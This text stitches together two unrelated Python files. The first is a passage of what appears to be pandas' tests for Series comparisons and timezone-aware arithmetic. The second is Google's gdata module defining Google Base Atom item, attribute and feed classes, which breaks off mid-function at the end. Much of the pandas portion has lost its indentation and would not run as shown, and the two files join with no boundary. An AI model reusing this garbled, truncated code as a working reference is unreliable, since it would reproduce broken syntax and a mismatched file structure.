tm.assert_series_equal(left.lt(right, fill_value=0), exp)
exp = pd.Series([True, True, True, False], index=list("abcd"))
tm.assert_series_equal(left.ge(right, fill_value=0), exp)
exp = pd.Series([True, True, False, False], index=list("abcd"))
tm.assert_series_equal(left.gt(right, fill_value=0), exp)
class TestSeriesComparison:
def test_comparison_different_length(self):
a = Series(["a", "b", "c"])
b = Series(["b", "a"])
msg = "only compare identically-labeled Series"
with pytest.raises(ValueError, match=msg):
a < b
a = Series([1, 2])
b = Series([2, 3, 4])
with pytest.raises(ValueError, match=msg):
a == b
@pytest.mark.parametrize("opname", ["eq", "ne", "gt", "lt", "ge", "le"])
def test_ser_flex_cmp_return_dtypes(self, opname):
# GH#15115
ser = Series([1, 3, 2], index=range(3))
const = 2
result = getattr(ser, opname)(const).dtypes
expected = np.dtype("bool")
assert result == expected
@pytest.mark.parametrize("opname", ["eq", "ne", "gt", "lt", "ge", "le"])
def test_ser_flex_cmp_return_dtypes_empty(self, opname):
# GH#15115 empty Series case
ser = Series([1, 3, 2], index=range(3))
empty = ser.iloc[:0]
const = 2
result = getattr(empty, opname)(const).dtypes
expected = np.dtype("bool")
assert result == expected
@pytest.mark.parametrize(
"op",
[operator.eq, operator.ne, operator.le, operator.lt, operator.ge, operator.gt],
)
@pytest.mark.parametrize(
"names", [(None, None, None), ("foo", "bar", None), ("baz", "baz", "baz")]
)
def test_ser_cmp_result_names(self, names, op):
# datetime64 dtype
dti = pd.date_range("1949-06-07 03:00:00", freq="H", periods=5, name=names[0])
ser = Series(dti).rename(names[1])
result = op(ser, dti)
assert result.name == names[2]
# datetime64tz dtype
dti = dti.tz_localize("US/Central")
dti = pd.DatetimeIndex(dti, freq="infer") # freq not preserved by tz_localize
ser = Series(dti).rename(names[1])
result = op(ser, dti)
assert result.name == names[2]
# timedelta64 dtype
tdi = dti - dti.shift(1)
ser = Series(tdi).rename(names[1])
result = op(ser, tdi)
assert result.name == names[2]
# interval dtype
if op in [operator.eq, operator.ne]:
# interval dtype comparisons not yet implemented
ii = pd.interval_range(start=0, periods=5, name=names[0])
ser = Series(ii).rename(names[1])
result = op(ser, ii)
assert result.name == names[2]
# categorical
if op in [operator.eq, operator.ne]:
# categorical dtype comparisons raise for inequalities
cidx = tdi.astype("category")
ser = Series(cidx).rename(names[1])
result = op(ser, cidx)
assert result.name == names[2]
def test_comparisons(self):
left = np.random.randn(10)
right = np.random.randn(10)
left[:3] = np.nan
result = nanops.nangt(left, right)
with np.errstate(invalid="ignore"):
expected = (left > right).astype("O")
expected[:3] = np.nan
tm.assert_almost_equal(result, expected)
s = Series(["a", "b", "c"])
s2 = Series([False, True, False])
# it works!
exp = Series([False, False, False])
tm.assert_series_equal(s == s2, exp)
tm.assert_series_equal(s2 == s, exp)
# -----------------------------------------------------------------
# Categorical Dtype Comparisons
def test_categorical_comparisons(self):
# GH#8938
# allow equality comparisons
a = Series(list("abc"), dtype="category")
b = Series(list("abc"), dtype="object")
c = Series(["a", "b", "cc"], dtype="object")
d = Series(list("acb"), dtype="object")
e = Categorical(list("abc"))
f = Categorical(list("acb"))
# vs scalar
assert not (a == "a").all()
assert ((a != "a") == ~(a == "a")).all()
assert not ("a" == a).all()
assert (a == "a")[0]
assert ("a" == a)[0]
assert not ("a" != a)[0]
# vs list-like
assert (a == a).all()
assert not (a != a).all()
assert (a == list(a)).all()
assert (a == b).all()
assert (b == a).all()
assert ((~(a == b)) == (a != b)).all()
assert ((~(b == a)) == (b != a)).all()
assert not (a == c).all()
assert not (c == a).all()
assert not (a == d).all()
assert not (d == a).all()
# vs a cat-like
assert (a == e).all()
assert (e == a).all()
assert not (a == f).all()
assert not (f == a).all()
assert (~(a == e) == (a != e)).all()
assert (~(e == a) == (e != a)).all()
assert (~(a == f) == (a != f)).all()
assert (~(f == a) == (f != a)).all()
# non-equality is not comparable
msg = "can only compare equality or not"
with pytest.raises(TypeError, match=msg):
a < b
with pytest.raises(TypeError, match=msg):
b < a
with pytest.raises(TypeError, match=msg):
a > b
with pytest.raises(TypeError, match=msg):
b > a
def test_unequal_categorical_comparison_raises_type_error(self):
# unequal comparison should raise for unordered cats
cat = Series(Categorical(list("abc")))
msg = "can only compare equality or not"
with pytest.raises(TypeError, match=msg):
cat > "b"
cat = Series(Categorical(list("abc"), ordered=False))
with pytest.raises(TypeError, match=msg):
cat > "b"
# https://github.com/pandas-dev/pandas/issues/9836#issuecomment-92123057
# and following comparisons with scalars not in categories should raise
# for unequal comps, but not for equal/not equal
cat = Series(Categorical(list("abc"), ordered=True))
msg = "Cannot compare a Categorical for op.+with a scalar"
with pytest.raises(TypeError, match=msg):
cat < "d"
with pytest.raises(TypeError, match=msg):
cat > "d"
with pytest.raises(TypeError, match=msg):
"d" < cat
with pytest.raises(TypeError, match=msg):
"d" > cat
tm.assert_series_equal(cat == "d", Series([False, False, False]))
tm.assert_series_equal(cat != "d", Series([True, True, True]))
# -----------------------------------------------------------------
def test_comparison_tuples(self):
# GH#11339
# comparisons vs tuple
s = Series([(1, 1), (1, 2)])
result = s == (1, 2)
expected = Series([False, True])
tm.assert_series_equal(result, expected)
result = s != (1, 2)
expected = Series([True, False])
tm.assert_series_equal(result, expected)
result = s == (0, 0)
expected = Series([False, False])
tm.assert_series_equal(result, expected)
result = s != (0, 0)
expected = Series([True, True])
tm.assert_series_equal(result, expected)
s = Series([(1, 1), (1, 1)])
result = s == (1, 1)
expected = Series([True, True])
tm.assert_series_equal(result, expected)
result = s != (1, 1)
expected = Series([False, False])
tm.assert_series_equal(result, expected)
s = Series([frozenset([1]), frozenset([1, 2])])
result = s == frozenset([1])
expected = Series([True, False])
tm.assert_series_equal(result, expected)
def test_comparison_operators_with_nas(self):
ser = Series(bdate_range("1/1/2000", periods=10), dtype=object)
ser[::2] = np.nan
# test that comparisons work
ops = ["lt", "le", "gt", "ge", "eq", "ne"]
for op in ops:
val = ser[5]
f = getattr(operator, op)
result = f(ser, val)
expected = f(ser.dropna(), val).reindex(ser.index)
if op == "ne":
expected = expected.fillna(True).astype(bool)
else:
expected = expected.fillna(False).astype(bool)
tm.assert_series_equal(result, expected)
# FIXME: dont leave commented-out
# fffffffuuuuuuuuuuuu
# result = f(val, s)
# expected = f(val, s.dropna()).reindex(s.index)
# tm.assert_series_equal(result, expected)
def test_ne(self):
    # Index ``!=`` against a scalar must agree with the negation of ``==``.
    values = [3, 4, 5, 6, 7]
    ts = Series(values, values, dtype=float)
    expected = [True, True, False, True, True]
    assert tm.equalContents(ts.index != 5, expected)
    assert tm.equalContents(~(ts.index == 5), expected)
def test_comp_ops_df_compat(self):
    # GH 1134: comparisons between Series with non-identical indexes must
    # raise, and the DataFrame forms of the same comparisons must raise too.
    s1 = pd.Series([1, 2, 3], index=list("ABC"), name="x")
    s2 = pd.Series([2, 2, 2], index=list("ABD"), name="x")
    s3 = pd.Series([1, 2, 3], index=list("ABC"), name="x")
    s4 = pd.Series([2, 2, 2, 2], index=list("ABCD"), name="x")

    ser_msg = "Can only compare identically-labeled Series objects"
    df_msg = "Can only compare identically-labeled DataFrame objects"
    for left, right in [(s1, s2), (s2, s1), (s3, s4), (s4, s3)]:
        for op in (operator.eq, operator.ne, operator.lt):
            with pytest.raises(ValueError, match=ser_msg):
                op(left, right)
            with pytest.raises(ValueError, match=df_msg):
                op(left.to_frame(), right.to_frame())
def test_compare_series_interval_keyword(self):
# GH#25338
s = Series(["IntervalA", "IntervalB", "IntervalC"])
result = s == "IntervalA"
expected = Series([True, False, False])
tm.assert_series_equal(result, expected)
# ------------------------------------------------------------------
# Unsorted
# These arithmetic tests were previously in other files, eventually
# should be parametrized and put into tests.arithmetic
class TestTimeSeriesArithmetic:
    """Arithmetic on datetime-indexed Series, mostly timezone handling."""

    # TODO: De-duplicate with the test below.
    def test_series_add_tz_mismatch_converts_to_utc_duplicate(self):
        # Adding Series whose indexes carry different timezones should
        # yield a UTC index, regardless of operand order.
        rng = date_range("1/1/2011", periods=10, freq="H", tz="US/Eastern")
        eastern = Series(np.random.randn(len(rng)), index=rng)
        moscow = eastern.tz_convert("Europe/Moscow")

        assert (eastern + moscow).index.tz is pytz.utc
        assert (moscow + eastern).index.tz is pytz.utc

    def test_series_add_tz_mismatch_converts_to_utc(self):
        rng = date_range("1/1/2011", periods=100, freq="H", tz="utc")

        # Two Series over random overlapping subsets of the same instants,
        # viewed in two different timezones.
        perm = np.random.permutation(100)[:90]
        ser1 = Series(
            np.random.randn(90), index=rng.take(perm).tz_convert("US/Eastern")
        )
        perm = np.random.permutation(100)[:90]
        ser2 = Series(
            np.random.randn(90), index=rng.take(perm).tz_convert("Europe/Berlin")
        )

        result = ser1 + ser2
        expected = ser1.tz_convert("utc") + ser2.tz_convert("utc")
        assert result.index.tz == pytz.UTC
        tm.assert_series_equal(result, expected)

    def test_series_add_aware_naive_raises(self):
        # Mixing tz-naive and tz-aware indexes must raise either way round.
        rng = date_range("1/1/2011", periods=10, freq="H")
        naive = Series(np.random.randn(len(rng)), index=rng)
        aware = naive.tz_localize("utc")

        msg = "Cannot join tz-naive with tz-aware DatetimeIndex"
        for left, right in ((naive, aware), (aware, naive)):
            with pytest.raises(Exception, match=msg):
                left + right

    def test_datetime_understood(self):
        # GH#16726: subtracting a DateOffset from a datetime Series must
        # produce the correctly shifted dates.
        series = pd.Series(pd.date_range("2012-01-01", periods=3))
        result = series - pd.offsets.DateOffset(days=6)
        expected = pd.Series(pd.to_datetime(["2011-12-26", "2011-12-27", "2011-12-28"]))
        tm.assert_series_equal(result, expected)
| |
#!/usr/bin/python
#
# Copyright (C) 2006 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains extensions to Atom objects used with Google Base."""
__author__ = 'api.jscudder (Jeffrey Scudder)'
try:
from xml.etree import cElementTree as ElementTree
except ImportError:
try:
import cElementTree as ElementTree
except ImportError:
from elementtree import ElementTree
import atom
import gdata
# XML namespaces which are often used in Google Base entities.
GBASE_NAMESPACE = 'http://base.google.com/ns/1.0'  # the g: data namespace
GBASE_TEMPLATE = '{http://base.google.com/ns/1.0}%s'  # ElementTree qualified-tag template for g:
GMETA_NAMESPACE = 'http://base.google.com/ns-metadata/1.0'  # the gm: metadata namespace
GMETA_TEMPLATE = '{http://base.google.com/ns-metadata/1.0}%s'  # qualified-tag template for gm:
class ItemAttributeContainer(object):
    """Provides methods for finding Google Base Item attributes.

    Google Base item attributes are child nodes in the gbase namespace. Google
    Base allows you to define your own item attributes and this class provides
    methods to interact with the custom attributes.

    Classes mixing this in must provide an ``item_attributes`` list member.
    """

    def GetItemAttributes(self, name):
        """Returns a list of all item attributes which have the desired name.

        Args:
            name: str The tag of the desired base attributes. For example, calling
                this method with 'rating' would return a list of ItemAttributes
                represented by a 'g:rating' tag.

        Returns:
            A list of matching ItemAttribute objects.
        """
        result = []
        for attrib in self.item_attributes:
            if attrib.name == name:
                result.append(attrib)
        return result

    def FindItemAttribute(self, name):
        """Get the contents of the first Base item attribute which matches name.

        This method is deprecated, please use GetItemAttributes instead.

        Args:
            name: str The tag of the desired base attribute. For example, calling
                this method with name = 'rating' would search for a tag rating
                in the GBase namespace in the item attributes.

        Returns:
            The text contents of the item attribute, or None if the attribute
            was not found.
        """
        for attrib in self.item_attributes:
            if attrib.name == name:
                return attrib.text
        return None

    def AddItemAttribute(self, name, value, value_type=None):
        """Adds a new item attribute tag containing the value.

        Creates a new extension element in the GBase namespace to represent a
        Google Base item attribute.

        Args:
            name: str The tag name for the new attribute. This must be a valid
                xml tag name. The tag will be placed in the GBase namespace.
            value: str Contents for the item attribute.
            value_type: str (optional) The type of data in the value. Examples:
                text, float.
        """
        new_attribute = ItemAttribute(name, text=value,
                                      text_type=value_type)
        self.item_attributes.append(new_attribute)

    def SetItemAttribute(self, name, value):
        """Changes the value of the first item attribute whose name matches.

        Does nothing if no attribute with the given name exists.

        Args:
            name: str The tag name of the attribute to change.
            value: str The new text contents for the attribute.
        """
        for attrib in self.item_attributes:
            if attrib.name == name:
                attrib.text = value
                return

    def RemoveItemAttribute(self, name):
        """Deletes the first item attribute whose name matches.

        Does nothing if no attribute with the given name exists.

        Args:
            name: str The tag name of the attribute to delete.
        """
        for i in xrange(len(self.item_attributes)):
            if self.item_attributes[i].name == name:
                del self.item_attributes[i]
                return

    # We need to overwrite _ConvertElementTreeToMember to add special logic to
    # convert custom attributes to members.
    def _ConvertElementTreeToMember(self, child_tree):
        # Find the element's tag in this class's list of child members.
        if self.__class__._children.has_key(child_tree.tag):
            member_name = self.__class__._children[child_tree.tag][0]
            member_class = self.__class__._children[child_tree.tag][1]
            # If the class member is supposed to contain a list, make sure the
            # matching member is set to a list, then append the new member
            # instance to the list.
            if isinstance(member_class, list):
                if getattr(self, member_name) is None:
                    setattr(self, member_name, [])
                getattr(self, member_name).append(atom._CreateClassFromElementTree(
                    member_class[0], child_tree))
            else:
                setattr(self, member_name,
                        atom._CreateClassFromElementTree(member_class, child_tree))
        elif child_tree.tag.find('{%s}' % GBASE_NAMESPACE) == 0:
            # If this is in the gbase namespace, make it into an extension element.
            name = child_tree.tag[child_tree.tag.index('}')+1:]
            value = child_tree.text
            if child_tree.attrib.has_key('type'):
                value_type = child_tree.attrib['type']
            else:
                value_type = None
            self.AddItemAttribute(name, value, value_type)
        else:
            # Bug fix: this previously referenced a bare ``ExtensionContainer``
            # (a NameError at runtime) — the class lives in the atom module,
            # as the matching call in _AddMembersToElementTree shows.
            atom.ExtensionContainer._ConvertElementTreeToMember(self, child_tree)

    # We need to overwrite _AddMembersToElementTree to add special logic to
    # convert custom members to XML nodes.
    def _AddMembersToElementTree(self, tree):
        # Convert the members of this class which are XML child nodes.
        # This uses the class's _children dictionary to find the members which
        # should become XML child nodes.
        member_node_names = [values[0] for tag, values in
                             self.__class__._children.iteritems()]
        for member_name in member_node_names:
            member = getattr(self, member_name)
            if member is None:
                pass
            elif isinstance(member, list):
                for instance in member:
                    instance._BecomeChildElement(tree)
            else:
                member._BecomeChildElement(tree)
        # Convert the members of this class which are XML attributes.
        for xml_attribute, member_name in self.__class__._attributes.iteritems():
            member = getattr(self, member_name)
            if member is not None:
                tree.attrib[xml_attribute] = member
        # Convert all special custom item attributes to nodes.
        for attribute in self.item_attributes:
            attribute._BecomeChildElement(tree)
        # Lastly, call the ExtensionContainer's _AddMembersToElementTree to
        # convert any extension attributes.
        atom.ExtensionContainer._AddMembersToElementTree(self, tree)
class ItemAttribute(atom.Text):
    """An optional or user defined attribute for a GBase item.

    Google Base allows items to have custom attribute child nodes. These nodes
    have contents and a type attribute which tells Google Base whether the
    contents are text, a float value with units, etc. The Atom text class has
    the same structure, so this class inherits from Text.
    """

    _namespace = GBASE_NAMESPACE
    # Copy the parent's parsing tables so additions do not mutate atom.Text.
    _children = atom.Text._children.copy()
    _attributes = atom.Text._attributes.copy()

    def __init__(self, name, text_type=None, text=None,
                 extension_elements=None, extension_attributes=None):
        """Constructor for a GBase item attribute.

        Args:
            name: str The name of the attribute. Examples include
                price, color, make, model, pages, salary, etc.
            text_type: str (optional) The type associated with the text contents
            text: str (optional) The text data in the this element
            extension_elements: list (optional) A list of ExtensionElement
                instances
            extension_attributes: dict (optional) A dictionary of attribute
                value string pairs
        """
        self.name = name
        self.type = text_type
        self.text = text
        self.extension_elements = extension_elements or []
        self.extension_attributes = extension_attributes or {}

    def _BecomeChildElement(self, tree):
        # Append a placeholder element first and rename it afterwards: the
        # tag is dynamic because it embeds self.name.
        new_child = ElementTree.Element('')
        tree.append(new_child)
        new_child.tag = '{%s}%s' % (self.__class__._namespace,
                                    self.name)
        self._AddMembersToElementTree(new_child)

    def _ToElementTree(self):
        # Standalone variant: the element can be created with its final,
        # name-derived tag directly.
        new_tree = ElementTree.Element('{%s}%s' % (self.__class__._namespace,
                                                   self.name))
        self._AddMembersToElementTree(new_tree)
        return new_tree
def ItemAttributeFromString(xml_string):
    """Parse an XML string into an ItemAttribute, or None if not parseable."""
    tree = ElementTree.fromstring(xml_string)
    return _ItemAttributeFromElementTree(tree)
def _ItemAttributeFromElementTree(element_tree):
    """Build an ItemAttribute from an ElementTree node.

    Returns None when the node is not in the gbase namespace or carries an
    empty attribute name.
    """
    tag = element_tree.tag
    if not tag.startswith(GBASE_TEMPLATE % ''):
        return None
    attribute = ItemAttribute('')
    attribute._HarvestElementTree(element_tree)
    # The attribute name is the local part of the qualified tag.
    attribute.name = tag[tag.index('}') + 1:]
    if not attribute.name:
        return None
    return attribute
class Label(atom.AtomBase):
    """The Google Base label element (g:label)."""

    _tag = 'label'
    _namespace = GBASE_NAMESPACE
    # Copy parsing tables so additions do not mutate atom.AtomBase.
    _children = atom.AtomBase._children.copy()
    _attributes = atom.AtomBase._attributes.copy()

    def __init__(self, text=None, extension_elements=None,
                 extension_attributes=None):
        """Constructor for a label.

        Args:
            text: str (optional) The text contents of the label.
            extension_elements: list (optional) ExtensionElement instances.
            extension_attributes: dict (optional) attribute/value string pairs.
        """
        self.text = text
        self.extension_elements = extension_elements or []
        self.extension_attributes = extension_attributes or {}
def LabelFromString(xml_string):
    """Deserialize a Label instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(Label, xml_string)
    return parsed
class ItemType(atom.Text):
    """The Google Base item_type element (g:item_type)."""

    _tag = 'item_type'
    _namespace = GBASE_NAMESPACE
    # Copy parsing tables so additions do not mutate atom.Text.
    _children = atom.Text._children.copy()
    _attributes = atom.Text._attributes.copy()

    def __init__(self, text=None, extension_elements=None,
                 text_type=None, extension_attributes=None):
        """Constructor for an item type.

        Args:
            text: str (optional) The item type value, e.g. 'products'.
            extension_elements: list (optional) ExtensionElement instances.
            text_type: str (optional) The type of the text contents.
            extension_attributes: dict (optional) attribute/value string pairs.
        """
        self.text = text
        self.type = text_type
        self.extension_elements = extension_elements or []
        self.extension_attributes = extension_attributes or {}
def ItemTypeFromString(xml_string):
    """Deserialize an ItemType instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(ItemType, xml_string)
    return parsed
class MetaItemType(ItemType):
    """The Google Base item_type element in the metadata namespace (gm:item_type).

    Same structure as ItemType, but resolved against GMETA_NAMESPACE — used by
    the item types metadata feed.
    """

    _tag = 'item_type'
    _namespace = GMETA_NAMESPACE
    _children = ItemType._children.copy()
    _attributes = ItemType._attributes.copy()
def MetaItemTypeFromString(xml_string):
    """Deserialize a MetaItemType instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(MetaItemType, xml_string)
    return parsed
class Value(atom.AtomBase):
    """Metadata about common values for a given attribute.

    A value is a child of an attribute which comes from the attributes feed.
    The value's text is a commonly used value paired with an attribute name
    and the value's count tells how often this value appears for the given
    attribute in the search results.
    """

    _tag = 'value'
    _namespace = GMETA_NAMESPACE
    _children = atom.AtomBase._children.copy()
    _attributes = atom.AtomBase._attributes.copy()
    # Map the XML 'count' attribute onto the .count member.
    _attributes['count'] = 'count'

    def __init__(self, count=None, text=None, extension_elements=None,
                 extension_attributes=None):
        """Constructor for Attribute metadata element.

        Args:
            count: str (optional) The number of times the value in text is given
                for the parent attribute.
            text: str (optional) The value which appears in the search results.
            extension_elements: list (optional) A list of ExtensionElement
                instances
            extension_attributes: dict (optional) A dictionary of attribute value
                string pairs
        """
        self.count = count
        self.text = text
        self.extension_elements = extension_elements or []
        self.extension_attributes = extension_attributes or {}
def ValueFromString(xml_string):
    """Deserialize a Value instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(Value, xml_string)
    return parsed
class Attribute(atom.Text):
    """Metadata about an attribute from the attributes feed.

    An entry from the attributes feed contains a list of attributes. Each
    attribute describes the attribute's type and count of the items which
    use the attribute.
    """

    _tag = 'attribute'
    _namespace = GMETA_NAMESPACE
    _children = atom.Text._children.copy()
    _attributes = atom.Text._attributes.copy()
    # gm:value children are collected into the .value list member.
    _children['{%s}value' % GMETA_NAMESPACE] = ('value', [Value])
    _attributes['count'] = 'count'
    _attributes['name'] = 'name'

    def __init__(self, name=None, attribute_type=None, count=None, value=None,
                 text=None, extension_elements=None, extension_attributes=None):
        """Constructor for Attribute metadata element.

        Args:
            name: str (optional) The name of the attribute
            attribute_type: str (optional) The type for the attribute. Examples:
                text, float, etc.
            count: str (optional) The number of times this attribute appears in
                the query results.
            value: list (optional) The values which are often used for this
                attribute.
            text: str (optional) The text contents of the XML for this attribute.
            extension_elements: list (optional) A list of ExtensionElement
                instances
            extension_attributes: dict (optional) A dictionary of attribute value
                string pairs
        """
        self.name = name
        self.type = attribute_type
        self.count = count
        self.value = value or []
        self.text = text
        self.extension_elements = extension_elements or []
        self.extension_attributes = extension_attributes or {}
def AttributeFromString(xml_string):
    """Deserialize an Attribute instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(Attribute, xml_string)
    return parsed
class Attributes(atom.AtomBase):
    """A collection of Google Base metadata attributes (gm:attributes)."""

    _tag = 'attributes'
    _namespace = GMETA_NAMESPACE
    _children = atom.AtomBase._children.copy()
    _attributes = atom.AtomBase._attributes.copy()
    # gm:attribute children are collected into the .attribute list member.
    _children['{%s}attribute' % GMETA_NAMESPACE] = ('attribute', [Attribute])

    def __init__(self, attribute=None, extension_elements=None,
                 extension_attributes=None, text=None):
        """Constructor for the attributes collection.

        Args:
            attribute: list (optional) Attribute instances.
            extension_elements: list (optional) ExtensionElement instances.
            extension_attributes: dict (optional) attribute/value string pairs.
            text: str (optional) The text contents of the element.
        """
        self.attribute = attribute or []
        self.extension_elements = extension_elements or []
        self.extension_attributes = extension_attributes or {}
        self.text = text
class GBaseItem(ItemAttributeContainer, gdata.BatchEntry):
    """A Google Base flavor of an Atom Entry.

    Google Base items have required attributes, recommended attributes, and user
    defined attributes. The required attributes are stored in this class as
    members, and other attributes are stored as extension elements. You can
    access the recommended and user defined attributes by using
    AddItemAttribute, SetItemAttribute, FindItemAttribute, and
    RemoveItemAttribute (inherited from ItemAttributeContainer).
    """

    _tag = 'entry'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.BatchEntry._children.copy()
    _attributes = gdata.BatchEntry._attributes.copy()
    # g:label may repeat (list member); g:item_type is a single child.
    _children['{%s}label' % GBASE_NAMESPACE] = ('label', [Label])
    _children['{%s}item_type' % GBASE_NAMESPACE] = ('item_type', ItemType)

    def __init__(self, author=None, category=None, content=None,
                 contributor=None, atom_id=None, link=None, published=None, rights=None,
                 source=None, summary=None, title=None, updated=None, control=None,
                 label=None, item_type=None, item_attributes=None,
                 batch_operation=None, batch_id=None, batch_status=None,
                 text=None, extension_elements=None, extension_attributes=None):
        """Constructor; arguments mirror gdata.BatchEntry plus the Google
        Base specific label, item_type and item_attributes members."""
        self.author = author or []
        self.category = category or []
        self.content = content
        self.contributor = contributor or []
        self.id = atom_id
        self.link = link or []
        self.published = published
        self.rights = rights
        self.source = source
        self.summary = summary
        self.title = title
        self.updated = updated
        self.control = control
        self.label = label or []
        self.item_type = item_type
        # Custom g: attributes handled by ItemAttributeContainer.
        self.item_attributes = item_attributes or []
        self.batch_operation = batch_operation
        self.batch_id = batch_id
        self.batch_status = batch_status
        self.text = text
        self.extension_elements = extension_elements or []
        self.extension_attributes = extension_attributes or {}
def GBaseItemFromString(xml_string):
    """Deserialize a GBaseItem instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(GBaseItem, xml_string)
    return parsed
class GBaseSnippet(GBaseItem):
    """A Google Base snippet entry; structurally identical to GBaseItem."""

    _tag = 'entry'
    _namespace = atom.ATOM_NAMESPACE
    _children = GBaseItem._children.copy()
    _attributes = GBaseItem._attributes.copy()
def GBaseSnippetFromString(xml_string):
    """Deserialize a GBaseSnippet instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(GBaseSnippet, xml_string)
    return parsed
class GBaseAttributeEntry(gdata.GDataEntry):
    """An Atom Entry from the attributes feed."""

    _tag = 'entry'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.GDataEntry._children.copy()
    _attributes = gdata.GDataEntry._attributes.copy()
    # gm:attribute children are collected into the .attribute list member.
    _children['{%s}attribute' % GMETA_NAMESPACE] = ('attribute', [Attribute])

    def __init__(self, author=None, category=None, content=None,
                 contributor=None, atom_id=None, link=None, published=None, rights=None,
                 source=None, summary=None, title=None, updated=None, label=None,
                 attribute=None, control=None,
                 text=None, extension_elements=None, extension_attributes=None):
        """Constructor; arguments mirror gdata.GDataEntry plus label and the
        attribute metadata list."""
        self.author = author or []
        self.category = category or []
        self.content = content
        self.contributor = contributor or []
        self.id = atom_id
        self.link = link or []
        self.published = published
        self.rights = rights
        self.source = source
        self.summary = summary
        self.control = control
        self.title = title
        self.updated = updated
        self.label = label or []
        self.attribute = attribute or []
        self.text = text
        self.extension_elements = extension_elements or []
        self.extension_attributes = extension_attributes or {}
def GBaseAttributeEntryFromString(xml_string):
    """Deserialize a GBaseAttributeEntry instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(GBaseAttributeEntry, xml_string)
    return parsed
class GBaseItemTypeEntry(gdata.GDataEntry):
    """An Atom entry from the item types feed.

    These entries contain a list of attributes which are stored in one
    XML node called attributes. This class simplifies the data structure
    by treating attributes as a list of attribute instances.

    Note that the item_type for an item type entry is in the Google Base meta
    namespace as opposed to item_types encountered in other feeds.
    """

    _tag = 'entry'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.GDataEntry._children.copy()
    _attributes = gdata.GDataEntry._attributes.copy()
    # Both the wrapping gm:attributes node and bare gm:attribute children are
    # recognized; gm:item_type is the metadata-namespace variant.
    _children['{%s}attributes' % GMETA_NAMESPACE] = ('attributes', Attributes)
    _children['{%s}attribute' % GMETA_NAMESPACE] = ('attribute', [Attribute])
    _children['{%s}item_type' % GMETA_NAMESPACE] = ('item_type', MetaItemType)

    def __init__(self, author=None, category=None, content=None,
                 contributor=None, atom_id=None, link=None, published=None, rights=None,
                 source=None, summary=None, title=None, updated=None, label=None,
                 item_type=None, control=None, attribute=None, attributes=None,
                 text=None, extension_elements=None, extension_attributes=None):
        """Constructor; arguments mirror gdata.GDataEntry plus the item type
        and attribute metadata members."""
        self.author = author or []
        self.category = category or []
        self.content = content
        self.contributor = contributor or []
        self.id = atom_id
        self.link = link or []
        self.published = published
        self.rights = rights
        self.source = source
        self.summary = summary
        self.title = title
        self.updated = updated
        self.control = control
        self.label = label or []
        self.item_type = item_type
        self.attributes = attributes
        self.attribute = attribute or []
        self.text = text
        self.extension_elements = extension_elements or []
        self.extension_attributes = extension_attributes or {}
def GBaseItemTypeEntryFromString(xml_string):
    """Deserialize a GBaseItemTypeEntry instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(GBaseItemTypeEntry, xml_string)
    return parsed
class GBaseItemFeed(gdata.BatchFeed):
    """A feed containing Google Base Items."""

    _tag = 'feed'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.BatchFeed._children.copy()
    _attributes = gdata.BatchFeed._attributes.copy()
    # Parse atom:entry children as GBaseItem instances.
    _children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [GBaseItem])
def GBaseItemFeedFromString(xml_string):
    """Deserialize a GBaseItemFeed instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(GBaseItemFeed, xml_string)
    return parsed
class GBaseSnippetFeed(gdata.GDataFeed):
    """A feed containing Google Base Snippets."""

    _tag = 'feed'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.GDataFeed._children.copy()
    _attributes = gdata.GDataFeed._attributes.copy()
    # Parse atom:entry children as GBaseSnippet instances.
    _children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [GBaseSnippet])
def GBaseSnippetFeedFromString(xml_string):
    """Deserialize a GBaseSnippetFeed instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(GBaseSnippetFeed, xml_string)
    return parsed
class GBaseAttributesFeed(gdata.GDataFeed):
    """A feed containing Google Base Attributes.

    A query sent to the attributes feed will return a feed of
    attributes which are present in the items that match the
    query.
    """

    _tag = 'feed'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.GDataFeed._children.copy()
    _attributes = gdata.GDataFeed._attributes.copy()
    # Parse atom:entry children as GBaseAttributeEntry instances.
    _children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry',
                                                    [GBaseAttributeEntry])
def GBaseAttributesFeedFromString(xml_string):
    """Deserialize a GBaseAttributesFeed instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(GBaseAttributesFeed, xml_string)
    return parsed
class GBaseLocalesFeed(gdata.GDataFeed):
    """The locales feed from Google Base.

    This read-only feed defines the permitted locales for Google Base. The
    locale value identifies the language, currency, and date formats used in a
    feed.
    """

    _tag = 'feed'
    _namespace = atom.ATOM_NAMESPACE
    # No extra children: plain GData entries suffice for locale listings.
    _children = gdata.GDataFeed._children.copy()
    _attributes = gdata.GDataFeed._attributes.copy()
def GBaseLocalesFeedFromString(xml_string):
    """Deserialize a GBaseLocalesFeed instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(GBaseLocalesFeed, xml_string)
    return parsed
class GBaseItemTypesFeed(gdata.GDataFeed):
    """A feed from the Google Base item types feed."""

    _tag = 'feed'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.GDataFeed._children.copy()
    _attributes = gdata.GDataFeed._attributes.copy()
    # Parse atom:entry children as GBaseItemTypeEntry instances.
    _children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [GBaseItemTypeEntry])
def GBaseItemTypesFeedFromString(xml_string):
